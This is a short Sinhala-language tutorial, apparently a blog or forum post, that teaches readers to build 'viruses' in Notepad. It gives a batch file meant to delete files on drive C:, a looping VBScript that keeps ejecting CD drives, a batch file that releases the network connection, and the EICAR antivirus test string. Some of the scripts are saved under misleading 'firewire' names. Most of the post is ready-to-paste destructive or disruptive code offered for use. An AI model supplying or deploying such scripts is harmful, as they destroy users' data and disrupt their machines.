1.Dangerous virus එකක් හදන
විදිය:
මුලින්ම මේ code එක ඔයාලගෙ notepad එකට copy කර ගන්නකො..
@Echo off
Del C: *.* |y
ඊට පස්සෙ virus.bat කියන name එකෙන් මේ file එක save කරන්න…
මේක ඔයාලගෙ pc එකේ නොකරන එක තමා හොද
මේකෙන් hard එකේ os එකට අදාල data මෑකෙන්න ගන්නව.
2.CD/DVD ROM එකට ගේම දෙන විදිය:
මුලින්ම මේ code එක ඔයාලගෙ notepad එකට copy කර ගන්නකො..
Set oWMP = CreateObject(“WMPlayer.OCX.7”)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
ඊට පස්සෙ firewire.vbsකියන name එකෙන් මේ file එක save කරන්න…
මේකෙන් ඔයලාගෙ
CD-ROM drive එක දිගට eject වෙන්න ගන්නව මේ virus එක නවත්තන්න නම් task manager ගිහිල්ල Process Tab එකේ wscript.exe කියන එක stop කරන්න.
3. ඔයාලගෙ virus
guard එක වෑඩද
බලන්න
මුලින්ම මේ code එක ඔයාලගෙ notepad එකට copy කර ගන්නකො..
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
ඊට පස්සෙ EICAR.COM
කියන name එකෙන් මේ file එක save කරන්න…
Guard
එක වෑඩනම් ඉතින් සෙනිකව මේ file එක delete
වෙයි.
4.machine Internet connection එක block කරන
විදිය
මුලින්ම මේ code එක ඔයාලගෙ notepad එකට copy කර ගන්නකො..
@Echo off
Ipconfig /release
ඊට පස්සෙ firewireBlock.bat
කියන name එකෙන් මේ file එක save කරන්න…
එක ආයෙ
ගන්නනම් මේ පහල තියෙන code එක notepad එකේ type කරල firewireGet.bat නමින් save කරලrun කරන්න.
@Echo off
Ipconfig/renew